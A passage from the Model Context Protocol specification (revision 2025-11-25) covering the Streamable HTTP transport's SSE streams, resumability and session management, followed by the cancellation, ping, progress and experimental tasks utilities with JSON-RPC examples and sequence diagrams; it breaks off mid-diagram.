* The server **SHOULD** immediately send an SSE event consisting of an event
ID and an empty `data` field in order to prime the client to reconnect
(using that event ID as `Last-Event-ID`).
* After the server has sent an SSE event with an event ID to the client, the
server **MAY** close the *connection* (without terminating the *SSE stream*)
at any time in order to avoid holding a long-lived connection. The client
**SHOULD** then "poll" the SSE stream by attempting to reconnect.
* If the server does close the *connection* prior to terminating the *SSE stream*,
it **SHOULD** send an SSE event with a standard [`retry`](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=field%20name%20is%20%22retry%22) field before
closing the connection. The client **MUST** respect the `retry` field,
waiting the given number of milliseconds before attempting to reconnect.
* The SSE stream **SHOULD** eventually include a JSON-RPC *response* for the
JSON-RPC *request* sent in the POST body.
* The server **MAY** send JSON-RPC *requests* and *notifications* before sending the
JSON-RPC *response*. These messages **SHOULD** relate to the originating client
*request*.
* The server **MAY** terminate the SSE stream if the [session](#session-management)
expires.
* After the JSON-RPC *response* has been sent, the server **SHOULD** terminate the
SSE stream.
* Disconnection **MAY** occur at any time (e.g., due to network conditions).
Therefore:
* Disconnection **SHOULD NOT** be interpreted as the client cancelling its request.
* To cancel, the client **SHOULD** explicitly send an MCP `CancelledNotification`.
* To avoid message loss due to disconnection, the server **MAY** make the stream
[resumable](#resumability-and-redelivery).
### Listening for Messages from the Server
1. The client **MAY** issue an HTTP GET to the MCP endpoint. This can be used to open an
SSE stream, allowing the server to communicate to the client, without the client first
sending data via HTTP POST.
2. The client **MUST** include an `Accept` header, listing `text/event-stream` as a
supported content type.
3. The server **MUST** either return `Content-Type: text/event-stream` in response to
this HTTP GET, or else return HTTP 405 Method Not Allowed, indicating that the server
does not offer an SSE stream at this endpoint.
4. If the server initiates an SSE stream:
* The server **MAY** send JSON-RPC *requests* and *notifications* on the stream.
* These messages **SHOULD** be unrelated to any concurrently-running JSON-RPC
*request* from the client.
* The server **MUST NOT** send a JSON-RPC *response* on the stream **unless**
[resuming](#resumability-and-redelivery) a stream associated with a previous client
request.
* The server **MAY** close the SSE stream at any time.
* If the server closes the *connection* without terminating the *stream*, it
**SHOULD** follow the same polling behavior as described for POST requests:
sending a `retry` field and allowing the client to reconnect.
* The client **MAY** close the SSE stream at any time.
### Multiple Connections
1. The client **MAY** remain connected to multiple SSE streams simultaneously.
2. The server **MUST** send each of its JSON-RPC messages on only one of the connected
streams; that is, it **MUST NOT** broadcast the same message across multiple streams.
* The risk of message loss **MAY** be mitigated by making the stream
[resumable](#resumability-and-redelivery).
### Resumability and Redelivery
To support resuming broken connections, and redelivering messages that might otherwise be
lost:
1. Servers **MAY** attach an `id` field to their SSE events, as described in the
[SSE standard](https://html.spec.whatwg.org/multipage/server-sent-events.html#event-stream-interpretation).
* If present, the ID **MUST** be globally unique across all streams within that
[session](#session-management)—or all streams with that specific client, if session
management is not in use.
* Event IDs **SHOULD** encode sufficient information to identify the originating
stream, enabling the server to correlate a `Last-Event-ID` to the correct stream.
2. If the client wishes to resume after a disconnection (whether due to network failure
or server-initiated closure), it **SHOULD** issue an HTTP GET to the MCP endpoint,
and include the
[`Last-Event-ID`](https://html.spec.whatwg.org/multipage/server-sent-events.html#the-last-event-id-header)
header to indicate the last event ID it received.
* The server **MAY** use this header to replay messages that would have been sent
after the last event ID, *on the stream that was disconnected*, and to resume the
stream from that point.
* The server **MUST NOT** replay messages that would have been delivered on a
different stream.
* This mechanism applies regardless of how the original stream was initiated (via
POST or GET). Resumption is always via HTTP GET with `Last-Event-ID`.
In other words, these event IDs should be assigned by servers on a *per-stream* basis, to
act as a cursor within that particular stream.
### Session Management
An MCP "session" consists of logically related interactions between a client and a
server, beginning with the [initialization phase](/specification/2025-11-25/basic/lifecycle). To support
servers which want to establish stateful sessions:
1. A server using the Streamable HTTP transport **MAY** assign a session ID at
initialization time, by including it in an `MCP-Session-Id` header on the HTTP
response containing the `InitializeResult`.
* The session ID **SHOULD** be globally unique and cryptographically secure (e.g., a
securely generated UUID, a JWT, or a cryptographic hash).
* The session ID **MUST** only contain visible ASCII characters (ranging from 0x21 to
0x7E).
* The client **MUST** handle the session ID in a secure manner, see [Session Hijacking mitigations](/specification/2025-11-25/basic/security_best_practices#session-hijacking) for more details.
2. If an `MCP-Session-Id` is returned by the server during initialization, clients using
the Streamable HTTP transport **MUST** include it in the `MCP-Session-Id` header on
all of their subsequent HTTP requests.
* Servers that require a session ID **SHOULD** respond to requests without an
`MCP-Session-Id` header (other than initialization) with HTTP 400 Bad Request.
3. The server **MAY** terminate the session at any time, after which it **MUST** respond
to requests containing that session ID with HTTP 404 Not Found.
4. When a client receives HTTP 404 in response to a request containing an
`MCP-Session-Id`, it **MUST** start a new session by sending a new `InitializeRequest`
without a session ID attached.
5. Clients that no longer need a particular session (e.g., because the user is leaving
the client application) **SHOULD** send an HTTP DELETE to the MCP endpoint with the
`MCP-Session-Id` header, to explicitly terminate the session.
* The server **MAY** respond to this request with HTTP 405 Method Not Allowed,
indicating that the server does not allow clients to terminate sessions.
### Sequence Diagram
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
note over Client, Server: initialization
Client->>+Server: POST InitializeRequest
Server->>-Client: InitializeResponse MCP-Session-Id: 1868a90c...
Client->>+Server: POST InitializedNotification MCP-Session-Id: 1868a90c...
Server->>-Client: 202 Accepted
note over Client, Server: client requests
Client->>+Server: POST ... request ... MCP-Session-Id: 1868a90c...
alt single HTTP response
Server->>Client: ... response ...
else server opens SSE stream
loop while connection remains open
Server-)Client: ... SSE messages from server ...
end
Server-)Client: SSE event: ... response ...
end
deactivate Server
note over Client, Server: client notifications/responses
Client->>+Server: POST ... notification/response ... MCP-Session-Id: 1868a90c...
Server->>-Client: 202 Accepted
note over Client, Server: server requests
Client->>+Server: GET MCP-Session-Id: 1868a90c...
loop while connection remains open
Server-)Client: ... SSE messages from server ...
end
deactivate Server
```
### Protocol Version Header
If using HTTP, the client **MUST** include the `MCP-Protocol-Version: ` HTTP header on all subsequent requests to the MCP
server, allowing the MCP server to respond based on the MCP protocol version.
For example: `MCP-Protocol-Version: 2025-11-25`
The protocol version sent by the client **SHOULD** be the one [negotiated during
initialization](/specification/2025-11-25/basic/lifecycle#version-negotiation).
For backwards compatibility, if the server does *not* receive an `MCP-Protocol-Version`
header, and has no other way to identify the version - for example, by relying on the
protocol version negotiated during initialization - the server **SHOULD** assume protocol
version `2025-03-26`.
If the server receives a request with an invalid or unsupported
`MCP-Protocol-Version`, it **MUST** respond with `400 Bad Request`.
### Backwards Compatibility
Clients and servers can maintain backwards compatibility with the deprecated [HTTP+SSE
transport](/specification/2024-11-05/basic/transports#http-with-sse) (from
protocol version 2024-11-05) as follows:
**Servers** wanting to support older clients should:
* Continue to host both the SSE and POST endpoints of the old transport, alongside the
new "MCP endpoint" defined for the Streamable HTTP transport.
* It is also possible to combine the old POST endpoint and the new MCP endpoint, but
this may introduce unneeded complexity.
**Clients** wanting to support older servers should:
1. Accept an MCP server URL from the user, which may point to either a server using the
old transport or the new transport.
2. Attempt to POST an `InitializeRequest` to the server URL, with an `Accept` header as
defined above:
* If it succeeds, the client can assume this is a server supporting the new Streamable
HTTP transport.
* If it fails with the following HTTP status codes "400 Bad Request", "404 Not
Found" or "405 Method Not Allowed":
* Issue a GET request to the server URL, expecting that this will open an SSE stream
and return an `endpoint` event as the first event.
* When the `endpoint` event arrives, the client can assume this is a server running
the old HTTP+SSE transport, and should use that transport for all subsequent
communication.
## Custom Transports
Clients and servers **MAY** implement additional custom transport mechanisms to suit
their specific needs. The protocol is transport-agnostic and can be implemented over any
communication channel that supports bidirectional message exchange.
Implementers who choose to support custom transports **MUST** ensure they preserve the
JSON-RPC message format and lifecycle requirements defined by MCP. Custom transports
**SHOULD** document their specific connection establishment and message exchange patterns
to aid interoperability.
# Cancellation
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/cancellation
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) supports optional cancellation of in-progress requests
through notification messages. Either side can send a cancellation notification to
indicate that a previously-issued request should be terminated.
## Cancellation Flow
When a party wants to cancel an in-progress request, it sends a `notifications/cancelled`
notification containing:
* The ID of the request to cancel
* An optional reason string that can be logged or displayed
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/cancelled",
"params": {
"requestId": "123",
"reason": "User requested cancellation"
}
}
```
## Behavior Requirements
1. Cancellation notifications **MUST** only reference requests that:
* Were previously issued in the same direction
* Are believed to still be in-progress
2. The `initialize` request **MUST NOT** be cancelled by clients
3. For [task-augmented requests](./tasks), the `tasks/cancel` request **MUST** be used instead of the `notifications/cancelled` notification. Tasks have their own dedicated cancellation mechanism that returns the final task state.
4. Receivers of cancellation notifications **SHOULD**:
* Stop processing the cancelled request
* Free associated resources
* Not send a response for the cancelled request
5. Receivers **MAY** ignore cancellation notifications if:
* The referenced request is unknown
* Processing has already completed
* The request cannot be cancelled
6. The sender of the cancellation notification **SHOULD** ignore any response to the
request that arrives afterward
## Timing Considerations
Due to network latency, cancellation notifications may arrive after request processing
has completed, and potentially after a response has already been sent.
Both parties **MUST** handle these race conditions gracefully:
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Client->>Server: Request (ID: 123)
Note over Server: Processing starts
Client--)Server: notifications/cancelled (ID: 123)
alt
Note over Server: Processing may have completed before cancellation arrives
else If not completed
Note over Server: Stop processing
end
```
## Implementation Notes
* Both parties **SHOULD** log cancellation reasons for debugging
* Application UIs **SHOULD** indicate when cancellation is requested
## Error Handling
Invalid cancellation notifications **SHOULD** be ignored:
* Unknown request IDs
* Already completed requests
* Malformed notifications
This maintains the "fire and forget" nature of notifications while allowing for race
conditions in asynchronous communication.
# Ping
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/ping
**Protocol Revision**: 2025-11-25
The Model Context Protocol includes an optional ping mechanism that allows either party
to verify that their counterpart is still responsive and the connection is alive.
## Overview
The ping functionality is implemented through a simple request/response pattern. Either
the client or server can initiate a ping by sending a `ping` request.
## Message Format
A ping request is a standard JSON-RPC request with no parameters:
```json theme={null}
{
"jsonrpc": "2.0",
"id": "123",
"method": "ping"
}
```
## Behavior Requirements
1. The receiver **MUST** respond promptly with an empty response:
```json theme={null}
{
"jsonrpc": "2.0",
"id": "123",
"result": {}
}
```
2. If no response is received within a reasonable timeout period, the sender **MAY**:
* Consider the connection stale
* Terminate the connection
* Attempt reconnection procedures
## Usage Patterns
```mermaid theme={null}
sequenceDiagram
participant Sender
participant Receiver
Sender->>Receiver: ping request
Receiver->>Sender: empty response
```
## Implementation Considerations
* Implementations **SHOULD** periodically issue pings to detect connection health
* The frequency of pings **SHOULD** be configurable
* Timeouts **SHOULD** be appropriate for the network environment
* Excessive pinging **SHOULD** be avoided to reduce network overhead
## Error Handling
* Timeouts **SHOULD** be treated as connection failures
* Multiple failed pings **MAY** trigger connection reset
* Implementations **SHOULD** log ping failures for diagnostics
# Progress
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/progress
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) supports optional progress tracking for long-running
operations through notification messages. Either side can send progress notifications to
provide updates about operation status.
## Progress Flow
When a party wants to *receive* progress updates for a request, it includes a
`progressToken` in the request metadata.
* Progress tokens **MUST** be a string or integer value
* Progress tokens can be chosen by the sender using any means, but **MUST** be unique
across all active requests.
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "some_method",
"params": {
"_meta": {
"progressToken": "abc123"
}
}
}
```
The receiver **MAY** then send progress notifications containing:
* The original progress token
* The current progress value so far
* An optional "total" value
* An optional "message" value
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/progress",
"params": {
"progressToken": "abc123",
"progress": 50,
"total": 100,
"message": "Reticulating splines..."
}
}
```
* The `progress` value **MUST** increase with each notification, even if the total is
unknown.
* The `progress` and the `total` values **MAY** be floating point.
* The `message` field **SHOULD** provide relevant human readable progress information.
## Behavior Requirements
1. Progress notifications **MUST** only reference tokens that:
* Were provided in an active request
* Are associated with an in-progress operation
2. Receivers of progress requests **MAY**:
* Choose not to send any progress notifications
* Send notifications at whatever frequency they deem appropriate
* Omit the total value if unknown
3. For [task-augmented requests](./tasks), the `progressToken` provided in the original request **MUST** continue to be used for progress notifications throughout the task's lifetime, even after the `CreateTaskResult` has been returned. The progress token remains valid and associated with the task until the task reaches a terminal status.
* Progress notifications for tasks **MUST** use the same `progressToken` that was provided in the initial task-augmented request
* Progress notifications for tasks **MUST** stop after the task reaches a terminal status (`completed`, `failed`, or `cancelled`)
```mermaid theme={null}
sequenceDiagram
participant Sender
participant Receiver
Note over Sender,Receiver: Request with progress token
Sender->>Receiver: Method request with progressToken
Note over Sender,Receiver: Progress updates
Receiver-->>Sender: Progress notification (0.2/1.0)
Receiver-->>Sender: Progress notification (0.6/1.0)
Receiver-->>Sender: Progress notification (1.0/1.0)
Note over Sender,Receiver: Operation complete
Receiver->>Sender: Method response
```
## Implementation Notes
* Senders and receivers **SHOULD** track active progress tokens
* Both parties **SHOULD** implement rate limiting to prevent flooding
* Progress notifications **MUST** stop after completion
# Tasks
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/tasks
**Protocol Revision**: 2025-11-25
Tasks were introduced in version 2025-11-25 of the MCP specification and are currently considered **experimental**.
The design and behavior of tasks may evolve in future protocol versions.
The Model Context Protocol (MCP) allows requestors — which can be either clients or servers, depending on the direction of communication — to augment their requests with **tasks**. Tasks are durable state machines that carry information about the underlying execution state of the request they wrap, and are intended for requestor polling and deferred result retrieval. Each task is uniquely identifiable by a receiver-generated **task ID**.
Tasks are useful for representing expensive computations and batch processing requests, and integrate seamlessly with external job APIs.
## Definitions
Tasks represent parties as either "requestors" or "receivers," defined as follows:
* **Requestor:** The sender of a task-augmented request. This can be the client or the server — either can create tasks.
* **Receiver:** The receiver of a task-augmented request, and the entity executing the task. This can be the client or the server — either can receive and execute tasks.
## User Interaction Model
Tasks are designed to be **requestor-driven** - requestors are responsible for augmenting requests with tasks and for polling for the results of those tasks; meanwhile, receivers tightly control which requests (if any) support task-based execution and manages the lifecycles of those tasks.
This requestor-driven approach ensures deterministic response handling and enables sophisticated patterns such as dispatching concurrent requests, which only the requestor has sufficient context to orchestrate.
Implementations are free to expose tasks through any interface pattern that suits their needs — the protocol itself does not mandate any specific user interaction model.
## Capabilities
Servers and clients that support task-augmented requests **MUST** declare a `tasks` capability during initialization. The `tasks` capability is structured by request category, with boolean properties indicating which specific request types support task augmentation.
### Server Capabilities
Servers declare if they support tasks, and if so, which server-side requests can be augmented with tasks.
| Capability | Description |
| --------------------------- | ---------------------------------------------------- |
| `tasks.list` | Server supports the `tasks/list` operation |
| `tasks.cancel` | Server supports the `tasks/cancel` operation |
| `tasks.requests.tools.call` | Server supports task-augmented `tools/call` requests |
```json theme={null}
{
"capabilities": {
"tasks": {
"list": {},
"cancel": {},
"requests": {
"tools": {
"call": {}
}
}
}
}
}
```
### Client Capabilities
Clients declare if they support tasks, and if so, which client-side requests can be augmented with tasks.
| Capability | Description |
| --------------------------------------- | ---------------------------------------------------------------- |
| `tasks.list` | Client supports the `tasks/list` operation |
| `tasks.cancel` | Client supports the `tasks/cancel` operation |
| `tasks.requests.sampling.createMessage` | Client supports task-augmented `sampling/createMessage` requests |
| `tasks.requests.elicitation.create` | Client supports task-augmented `elicitation/create` requests |
```json theme={null}
{
"capabilities": {
"tasks": {
"list": {},
"cancel": {},
"requests": {
"sampling": {
"createMessage": {}
},
"elicitation": {
"create": {}
}
}
}
}
}
```
### Capability Negotiation
During the initialization phase, both parties exchange their `tasks` capabilities to establish which operations support task-based execution. Requestors **SHOULD** only augment requests with a task if the corresponding capability has been declared by the receiver.
For example, if a server's capabilities include `tasks.requests.tools.call: {}`, then clients may augment `tools/call` requests with a task. If a client's capabilities include `tasks.requests.sampling.createMessage: {}`, then servers may augment `sampling/createMessage` requests with a task.
If `capabilities.tasks` is not defined, the peer **SHOULD NOT** attempt to create tasks during requests.
The set of capabilities in `capabilities.tasks.requests` is exhaustive. If a request type is not present, it does not support task-augmentation.
`capabilities.tasks.list` controls if the `tasks/list` operation is supported by the party.
`capabilities.tasks.cancel` controls if the `tasks/cancel` operation is supported by the party.
### Tool-Level Negotiation
Tool calls are given special consideration for the purpose of task augmentation. In the result of `tools/list`, tools declare support for tasks via `execution.taskSupport`, which if present can have a value of `"required"`, `"optional"`, or `"forbidden"`.
This is to be interpreted as a fine-grained layer in addition to capabilities, following these rules:
1. If a server's capabilities do not include `tasks.requests.tools.call`, then clients **MUST NOT** attempt to use task augmentation on that server's tools, regardless of the `execution.taskSupport` value.
2. If a server's capabilities include `tasks.requests.tools.call`, then clients consider the value of `execution.taskSupport`, and handle it accordingly:
1. If `execution.taskSupport` is not present or `"forbidden"`, clients **MUST NOT** attempt to invoke the tool as a task. Servers **SHOULD** return a `-32601` (Method not found) error if a client attempts to do so. This is the default behavior.
2. If `execution.taskSupport` is `"optional"`, clients **MAY** invoke the tool as a task or as a normal request.
3. If `execution.taskSupport` is `"required"`, clients **MUST** invoke the tool as a task. Servers **MUST** return a `-32601` (Method not found) error if a client does not attempt to do so.
## Protocol Messages
### Creating Tasks
Task-augmented requests follow a two-phase response pattern that differs from normal requests:
* **Normal requests**: The server processes the request and returns the actual operation result directly.
* **Task-augmented requests**: The server accepts the request and immediately returns a `CreateTaskResult` containing task data. The actual operation result becomes available later through `tasks/result` after the task completes.
To create a task, requestors send a request with the `task` field included in the request params. Requestors **MAY** include a `ttl` value indicating the desired task lifetime duration (in milliseconds) since its creation.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "get_weather",
"arguments": {
"city": "New York"
},
"task": {
"ttl": 60000
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"statusMessage": "The operation is now in progress.",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 60000,
"pollInterval": 5000
}
}
}
```
When a receiver accepts a task-augmented request, it returns a [`CreateTaskResult`](/specification/2025-11-25/schema#createtaskresult) containing task data. The response does not include the actual operation result. The actual result (e.g., tool result for `tools/call`) becomes available only through `tasks/result` after the task completes.
When a task is created in response to a `tools/call` request, host applications may wish to return control to the model while the task is executing. This allows the model to continue processing other requests or perform additional work while waiting for the task to complete.
To support this pattern, servers can provide an optional `io.modelcontextprotocol/model-immediate-response` key in the `_meta` field of the `CreateTaskResult`. The value of this key should be a string intended to be passed as an immediate tool result to the model.
If a server does not provide this field, the host application can fall back to its own predefined message.
This guidance is non-binding and is provisional logic intended to account for the specific use case. This behavior may be formalized or modified as part of `CreateTaskResult` in future protocol versions.
### Getting Tasks
In the Streamable HTTP (SSE) transport, clients **MAY** disconnect from an SSE stream opened by the server in response to a `tasks/get` request at any time.
While this note is not prescriptive regarding the specific usage of SSE streams, all implementations **MUST** continue to comply with the existing [Streamable HTTP transport specification](../transports#sending-messages-to-the-server).
Requestors poll for task completion by sending [`tasks/get`](/specification/2025-11-25/schema#tasks%2Fget) requests.
Requestors **SHOULD** respect the `pollInterval` provided in responses when determining polling frequency.
Requestors **SHOULD** continue polling until the task reaches a terminal status (`completed`, `failed`, or `cancelled`), or until encountering the [`input_required`](#input-required-status) status. Note that invoking `tasks/result` does not imply that the requestor needs to stop polling - requestors **SHOULD** continue polling the task status via `tasks/get` if they are not actively waiting for `tasks/result` to complete.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "tasks/get",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"statusMessage": "The operation is now in progress.",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"pollInterval": 5000
}
}
```
### Retrieving Task Results
In the Streamable HTTP (SSE) transport, clients **MAY** disconnect from an SSE stream opened by the server in response to a `tasks/result` request at any time.
While this note is not prescriptive regarding the specific usage of SSE streams, all implementations **MUST** continue to comply with the existing [Streamable HTTP transport specification](../transports#sending-messages-to-the-server).
After a task completes the operation result is retrieved via [`tasks/result`](/specification/2025-11-25/schema#tasks%2Fresult). This is distinct from the initial `CreateTaskResult` response, which contains only task data. The result structure matches the original request type (e.g., `CallToolResult` for `tools/call`).
To retrieve the result of a completed task, requestors can send a `tasks/result` request:
While `tasks/result` blocks until the task reaches a terminal status, requestors can continue polling via `tasks/get` in parallel if they are not actively blocked waiting for the result, such as if their previous `tasks/result` request failed or was cancelled. This allows requestors to monitor status changes or display progress updates while the task executes, even after invoking `tasks/result`.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "tasks/result",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in New York:\nTemperature: 72°F\nConditions: Partly cloudy"
}
],
"isError": false,
"_meta": {
"io.modelcontextprotocol/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
### Task Status Notification
When a task status changes, receivers **MAY** send a [`notifications/tasks/status`](/specification/2025-11-25/schema#notifications%2Ftasks%2Fstatus) notification to inform the requestor of the change. This notification includes the full task state.
**Notification:**
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tasks/status",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "completed",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:50:00Z",
"ttl": 60000,
"pollInterval": 5000
}
}
```
The notification includes the full [`Task`](/specification/2025-11-25/schema#task) object, including the updated `status` and `statusMessage` (if present). This allows requestors to access the complete task state without making an additional `tasks/get` request.
Requestors **MUST NOT** rely on receiving this notifications, as it is optional. Receivers are not required to send status notifications and may choose to only send them for certain status transitions. Requestors **SHOULD** continue to poll via `tasks/get` to ensure they receive status updates.
### Listing Tasks
To retrieve a list of tasks, requestors can send a [`tasks/list`](/specification/2025-11-25/schema#tasks%2Flist) request. This operation supports pagination.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"method": "tasks/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"result": {
"tasks": [
{
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"pollInterval": 5000
},
{
"taskId": "abc123-def456-ghi789",
"status": "completed",
"createdAt": "2025-11-25T09:15:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 60000
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Cancelling Tasks
To explicitly cancel a task, requestors can send a [`tasks/cancel`](/specification/2025-11-25/schema#tasks%2Fcancel) request.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"method": "tasks/cancel",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "cancelled",
"statusMessage": "The task was cancelled by request.",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"pollInterval": 5000
}
}
```
## Behavior Requirements
These requirements apply to all parties that support receiving task-augmented requests.
### Task Support and Handling
1. Receivers that do not declare the task capability for a request type **MUST** process requests of that type normally, ignoring any task-augmentation metadata if present.
2. Receivers that declare the task capability for a request type **MAY** return an error for non-task-augmented requests, requiring requestors to use task augmentation.
### Task ID Requirements
1. Task IDs **MUST** be a string value.
2. Task IDs **MUST** be generated by the receiver when creating a task.
3. Task IDs **MUST** be unique among all tasks controlled by the receiver.
### Task Status Lifecycle
1. Tasks **MUST** begin in the `working` status when created.
2. Receivers **MUST** only transition tasks through the following valid paths:
1. From `working`: may move to `input_required`, `completed`, `failed`, or `cancelled`
2. From `input_required`: may move to `working`, `completed`, `failed`, or `cancelled`
3. Tasks with a `completed`, `failed`, or `cancelled` status are in a terminal state and **MUST NOT** transition to any other status
**Task Status State Diagram:**
```mermaid theme={null}
stateDiagram-v2
[*] --> working
working --> input_required
working --> terminal
input_required --> working
input_required --> terminal
terminal --> [*]
note right of terminal
Terminal states:
• completed
• failed
• cancelled
end note
```
### Input Required Status
With the Streamable HTTP (SSE) transport, servers often close SSE streams after delivering a response message, which can lead to ambiguity regarding the stream used for subsequent task messages.
Servers can handle this by enqueueing messages to the client to side-channel task-related messages alongside other responses.
Servers have flexibility in how they manage SSE streams during task polling and result retrieval, and clients **SHOULD** expect messages to be delivered on any SSE stream, including the HTTP GET stream.
One possible approach is maintaining an SSE stream on `tasks/result` (see notes on the `input_required` status).
Where possible, servers **SHOULD NOT** upgrade to an SSE stream in response to a `tasks/get` request, as the client has indicated it wishes to poll for a result.
While this note is not prescriptive regarding the specific usage of SSE streams, all implementations **MUST** continue to comply with the existing [Streamable HTTP transport specification](../transports#sending-messages-to-the-server).
1. When the task receiver has messages for the requestor that are necessary to complete the task, the receiver **SHOULD** move the task to the `input_required` status.
2. The receiver **MUST** include the `io.modelcontextprotocol/related-task` metadata in the request to associate it with the task.
3. When the requestor encounters the `input_required` status, it **SHOULD** preemptively call `tasks/result`.
4. When the receiver receives all required input, the task **SHOULD** transition out of `input_required` status (typically back to `working`).
### TTL and Resource Management
1. Receivers **MUST** include a `createdAt` [ISO 8601](https://datatracker.ietf.org/doc/html/rfc3339#section-5)-formatted timestamp in all task responses to indicate when the task was created.
2. Receivers **MUST** include a `lastUpdatedAt` [ISO 8601](https://datatracker.ietf.org/doc/html/rfc3339#section-5)-formatted timestamp in all task responses to indicate when the task was last updated.
3. Receivers **MAY** override the requested `ttl` duration.
4. Receivers **MUST** include the actual `ttl` duration (or `null` for unlimited) in `tasks/get` responses.
5. After a task's `ttl` lifetime has elapsed, receivers **MAY** delete the task and its results, regardless of the task status.
6. Receivers **MAY** include a `pollInterval` value (in milliseconds) in `tasks/get` responses to suggest polling intervals. Requestors **SHOULD** respect this value when provided.
### Result Retrieval
1. Receivers that accept a task-augmented request **MUST** return a `CreateTaskResult` as the response. This result **SHOULD** be returned as soon as possible after accepting the task.
2. When a receiver receives a `tasks/result` request for a task in a terminal status (`completed`, `failed`, or `cancelled`), it **MUST** return the final result of the underlying request, whether that is a successful result or a JSON-RPC error.
3. When a receiver receives a `tasks/result` request for a task in any other non-terminal status (`working` or `input_required`), it **MUST** block the response until the task reaches a terminal status.
4. For tasks in a terminal status, receivers **MUST** return from `tasks/result` exactly what the underlying request would have returned, whether that is a successful result or a JSON-RPC error.
### Associating Task-Related Messages
1. All requests, notifications, and responses related to a task **MUST** include the `io.modelcontextprotocol/related-task` key in their `_meta` field, with the value set to an object with a `taskId` matching the associated task ID.
1. For example, an elicitation that a task-augmented tool call depends on **MUST** share the same related task ID with that tool call's task.
2. For the `tasks/get`, `tasks/result`, and `tasks/cancel` operations, the `taskId` parameter in the request **MUST** be used as the source of truth for identifying the target task. Requestors **SHOULD NOT** include `io.modelcontextprotocol/related-task` metadata in these requests, and receivers **MUST** ignore such metadata if present in favor of the RPC method parameter.
Similarly, for the `tasks/get`, `tasks/list`, and `tasks/cancel` operations, receivers **SHOULD NOT** include `io.modelcontextprotocol/related-task` metadata in the result messages, as the `taskId` is already present in the response structure.
### Task Notifications
1. Receivers **MAY** send `notifications/tasks/status` notifications when a task's status changes.
2. Requestors **MUST NOT** rely on receiving the `notifications/tasks/status` notification, as it is optional.
3. When sent, the `notifications/tasks/status` notification **SHOULD NOT** include the `io.modelcontextprotocol/related-task` metadata, as the task ID is already present in the notification parameters.
### Task Progress Notifications
Task-augmented requests support progress notifications as defined in the [progress](./progress) specification. The `progressToken` provided in the initial request remains valid throughout the task lifetime.
### Task Listing
1. Receivers **SHOULD** use cursor-based pagination to limit the number of tasks returned in a single response.
2. Receivers **MUST** include a `nextCursor` in the response if more tasks are available.
3. Requestors **MUST** treat cursors as opaque tokens and not attempt to parse or modify them.
4. If a task is retrievable via `tasks/get` for a requestor, it **MUST** be retrievable via `tasks/list` for that requestor.
### Task Cancellation
1. Receivers **MUST** reject cancellation requests for tasks already in a terminal status (`completed`, `failed`, or `cancelled`) with error code `-32602` (Invalid params).
2. Upon receiving a valid cancellation request, receivers **SHOULD** attempt to stop the task execution and **MUST** transition the task to `cancelled` status before sending the response.
3. Once a task is cancelled, it **MUST** remain in `cancelled` status even if execution continues to completion or fails.
4. The `tasks/cancel` operation does not define deletion behavior. However, receivers **MAY** delete cancelled tasks at their discretion at any time, including immediately after cancellation or after the task `ttl` expires.
5. Requestors **SHOULD NOT** rely on cancelled tasks being retained for any specific duration and should retrieve any needed information before cancelling.
## Message Flow
### Basic Task Lifecycle
```mermaid theme={null}
sequenceDiagram
participant C as Client (Requestor)
participant S as Server (Receiver)
Note over C,S: 1. Task Creation
C->>S: Request with task field (ttl)
activate S
S->>C: CreateTaskResult (taskId, status: working, ttl, pollInterval)
deactivate S
Note over C,S: 2. Task Polling
C->>S: tasks/get (taskId)
activate S
S->>C: working
deactivate S
Note over S: Task processing continues...
C->>S: tasks/get (taskId)
activate S
S->>C: working
deactivate S
Note over S: Task completes
C->>S: tasks/get (taskId)
activate S
